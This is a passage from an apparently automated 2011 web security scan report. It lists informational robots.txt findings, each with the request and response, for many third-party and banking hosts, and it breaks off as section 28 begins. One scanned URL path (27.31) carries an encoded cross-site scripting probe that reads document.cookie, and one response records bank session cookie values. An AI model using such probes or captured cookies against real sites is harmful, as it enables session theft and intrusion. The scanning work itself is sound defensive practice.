Date: Tue, 26 Apr 2011 12:26:02 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "de7de-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=993
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.7. http://data.coremetrics.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:05 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "28b8a0-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=985
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.8. http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /b/ss/firstdataprod/1/H.20.3/s97121651181951

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: firstdata.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:30 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2341bb-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www384
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.9. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 26 Apr 2011 12:28:22 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

27.10. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 26 Apr 2011 00:43:47 GMT
Expires: Tue, 26 Apr 2011 00:43:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

27.11. http://linkhelp.clients.google.com/tbproxy/lh/fixurl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linkhelp.clients.google.com
Path:   /tbproxy/lh/fixurl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: linkhelp.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 26 Apr 2011 00:19:34 GMT
Expires: Tue, 26 Apr 2011 00:19:34 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.12. https://m8security.foxycart.com/files/foxycart_includes.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://m8security.foxycart.com
Path:   /files/foxycart_includes.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m8security.foxycart.com

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 12:40:11 GMT
Accept-Ranges: bytes
Connection: close
ETag: "1a-4cca1954-c847d"
Last-Modified: Fri, 29 Oct 2010 00:46:12 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

27.13. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 26 Apr 2011 00:59:38 GMT
Expires: Tue, 26 Apr 2011 00:59:38 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.14. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:46:28 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

27.15. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 27 Apr 2011 01:21:18 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 26 Apr 2011 01:21:18 GMT
Server: QS

User-agent: *
Disallow: /

27.16. http://realestatecenter.bankofamerica.com/RePortal/homepage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestatecenter.bankofamerica.com
Path:   /RePortal/homepage.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: realestatecenter.bankofamerica.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 12:44:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMo TAIo OUR STP COM INT STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
X-Powered-By: UrlRewriter.NET 1.8.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 271

User-agent: *
Disallow: /WebResource.axd
Disallow: /Include/
Disallow: /Public/Include/

User-agent: PropsmartCrawler
Disallow: /

User-agent: TruliaBot
Disallow: /

User-agent: *
Crawl-de
...[SNIP]...

27.17. http://response.firstdata.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://response.firstdata.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: response.firstdata.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:44:09 GMT
Connection: keep-alive
Content-Length: 41

# do not index
User-agent: *
Allow: /

27.18. http://s7.addthis.com/js/250/addthis_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:03:18 GMT
ETag: "e01e35-1b-4a143749a6980"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 25 Apr 2011 23:56:26 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


27.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYj_8CIJD_AioFkL8AAAEyBY-_AAAB  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYj_8CIJD_AioFkL8AAAEyBY-_AAAB

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 26 Apr 2011 00:06:25 GMT
Expires: Tue, 26 Apr 2011 00:06:25 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.20. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 26 Apr 2011 00:06:12 GMT
Expires: Tue, 26 Apr 2011 00:06:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.21. https://secure.comodo.com/management/passwordResetRequest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /management/passwordResetRequest.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.comodo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:52:51 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Fri, 31 Aug 2007 16:20:30 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

27.22. https://secure.comodo.net/ttb_searcher/trustlogo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /ttb_searcher/trustlogo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.comodo.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 12:41:02 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Fri, 31 Aug 2007 16:20:30 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

27.23. https://secure.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:41:02 GMT
Connection: close
Content-Length: 44

# do not index
User-agent: *
Disallow: /

27.24. https://shots-s.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shots-s.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:07 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Last-Modified: Thu, 24 Apr 2008 15:53:27 GMT
ETag: "1a-44ba0733bebc0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.25. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shots.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:06 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Last-Modified: Thu, 24 Apr 2008 15:53:27 GMT
ETag: "1a-44ba0733bebc0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.26. http://sofa.bankofamerica.com/eluminate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sofa.bankofamerica.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:03 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "1965e1-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=995
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.27. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.tenable.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:40 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 14:39:14 GMT
ETag: "12f279-38-30962880"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /*zenid=

27.28. http://themes.googleusercontent.com/font  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 26 Apr 2011 00:43:50 GMT
Expires: Tue, 26 Apr 2011 00:43:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

27.29. http://tools.google.com/service/update2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.google.com
Path:   /service/update2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tools.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 26 Apr 2011 00:34:50 GMT
Expires: Tue, 26 Apr 2011 00:34:50 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.30. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 26 Apr 2011 11:34:19 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=305 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Wed, 27 Apr 2011 11:34:18 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

27.31. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actividentity.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Feb 2011 17:21:08 GMT
ETag: "50029e-4b-49d1e8e404900"
Accept-Ranges: bytes
Content-Length: 75
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.actividentity.com/sitemap.xml
Disallow:

27.32. http://www.bankofamerica.com/adtrack/index.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /adtrack/index.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:48 GMT
Content-length: 1298
Content-type: text/plain
Last-modified: Sun, 20 Mar 2011 05:57:57 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: BIGipServerngen-www.80=2957424299.20480.0000; path=/

User-agent: * # applies to all robots
Disallow: /global     # disallow indexing of restricted areas
Disallow: /cfdocs
Disallow: /thirdparty
Disallow: /directbenefits
Disallow: /groupbanking

...[SNIP]...

27.33. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:15 GMT
Content-length: 30
Content-type: text/plain
Set-Cookie: SMIDENTITY=3Dga3Vk67lrjiIoX6BvV3IHi4kzYITRjrIugOUDl1ZXUWQRMsb6FbIiWilZ547PiZVSOMWdUn1R7KHfT6iqqaH7fl6KxeBJ2cl/0kbBPTeRPyW74Htxz8F6qUZtrECnPm1yi7GOvDe8MgAVVZMXI4V0ith8x3Yp+BXJ2MUj3aSP/nJxNm72H9EiBkrCpN6x4LLgWJR6CVWgOHFHyJI/bWvDWL8RbYOUWB0MgDwffZf7IvkFmLR2BtWeru844QV4EHXUNvdKQr9ADzdvdNCfDUxdCfMFS4F6fcCOQpWqKFHFbhAjq3rW72M2RJ4iKoBpbcF3jOXkJvGr5FcPJDZyN/v4O1CFVwmS2dGicSjRIjYoaFt7XMnEdR4JOhTzR+KzP5gdMu0Hz1uSzzrClRrJpTzMkiNeSXLe1Kk/RTH2Tv0Dka8t4Pg2+ZaHtZfusXeRgpiiZRf1IAbfAlUeNUvELlZ2S3lHgENseTW9xGim/VYkKkLlEaBAOJltkRDKKflSP; path=/; domain=.bankofamerica.com; secure
Set-Cookie: TLTSID=F5BEDAEC6FFF106F5076DD2132C2F06A; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=F5BEDAEC6FFF106F5076DD2132C2F06A; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:15 GMT
Last-modified: Fri, 08 Sep 2006 17:46:56 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /www/

27.34. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Mon, 25 Apr 2011 23:44:12 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

27.35. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:30 GMT
Server: Apache
Last-Modified: Sat, 22 Jan 2011 02:03:43 GMT
ETag: "216011-a8-49a65c6b57dc0"
Accept-Ranges: bytes
Content-Length: 168
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /contrib/
Disallow: /doc/
Disallow: /lib/
Disallow: /modules/
Disallow: /plugins/
Disallow: /scripts/
Disallow: /tmp/

27.36. https://www.comodo.com/login/comodo-members.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /login/comodo-members.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comodo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:51:57 GMT
Content-Type: text/plain
Content-Length: 3714
Last-Modified: Fri, 04 Feb 2011 22:16:34 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /css/
Disallow: /javascript/
Disallow: /images/
Disallow: /newsletters/
Disallow: /news/itn/images/
Disallow: /index.html?currency=USD&region=North%20America&country=US

...[SNIP]...

27.37. http://www.genbook.com/bookings/booknowjstag.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genbook.com
Path:   /bookings/booknowjstag.action

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.genbook.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:43:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f40043-de-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 222
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:43:49 GMT
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.genbook.com/sitemap.xml

User-agent: *
Disallow: /bookings/slot/reservation/*?*method=put
Disallow: /bookings/slot/reservation/30071103/39929633
Disallow: /bookings/slot/reservatio
...[SNIP]...

27.38. http://www.google.com/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 23:44:04 GMT
Expires: Mon, 25 Apr 2011 23:44:04 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.39. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 23:44:08 GMT
Expires: Mon, 25 Apr 2011 23:44:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.40. https://www.hackerguardian.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hackerguardian.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:36 GMT
Server: Apache
Last-Modified: Tue, 14 Oct 2008 09:47:30 GMT
ETag: "13fd5-2e4-45933810a9080"
Accept-Ranges: bytes
Content-Length: 740
Connection: close
Content-Type: text/plain

...User-agent: *
Disallow: /javascript/
Disallow: /ssl-certificate-support/
Disallow: /live-support.html
Disallow: /digital-ssl-certificate.html
Disallow: /confidence_pak.html
Disallow: /cvc.htm
...[SNIP]...

27.41. http://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.merrilledge.com

Response

HTTP/1.1 200 OK
Content-Length: 257
Content-Type: text/plain
Content-Location: http://www.merrilledge.com/publish/ose/tools/robots.txt
Last-Modified: Fri, 25 Jun 2010 15:58:09 GMT
Accept-Ranges: bytes
ETag: "807ed5347f14cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:28:12 GMT
Connection: keep-alive

User-agent: *

Disallow: http://www.merrilledge.com/publish/ose/tools/akamai-sureroute-test-object.htm
Disallow: https://www.merrilledge.com/publish/ose/tools/akamai-sureroute-test-object.htm
Disa
...[SNIP]...

27.42. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.merrilledge.com

Response

HTTP/1.1 200 OK
Content-Length: 257
Content-Type: text/plain
Content-Location: https://www.merrilledge.com/publish/ose/tools/robots.txt
Last-Modified: Fri, 25 Jun 2010 15:58:09 GMT
Accept-Ranges: bytes
ETag: "807ed5347f14cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:27:04 GMT
Connection: keep-alive

User-agent: *

Disallow: http://www.merrilledge.com/publish/ose/tools/akamai-sureroute-test-object.htm
Disallow: https://www.merrilledge.com/publish/ose/tools/akamai-sureroute-test-object.htm
Disa
...[SNIP]...

27.43. http://www.saintcorporation.com/products/saas/webSaintPro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /products/saas/webSaintPro.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.saintcorporation.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:11 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Thu, 10 Oct 2002 16:35:36 GMT
ETag: "1518d0ae-19-3aca93901c600"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:


27.44. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/secure/customer/logon.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.saintcorporation.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:52 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Thu, 10 Oct 2002 16:35:36 GMT
ETag: "1518d0ae-19-3aca93901c600"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:


28. Cacheable HTTPS response  previous  next
There are 39 instances of this issue:


28.1. https://account.snap.com/favicon.ico  previous  next

Summary

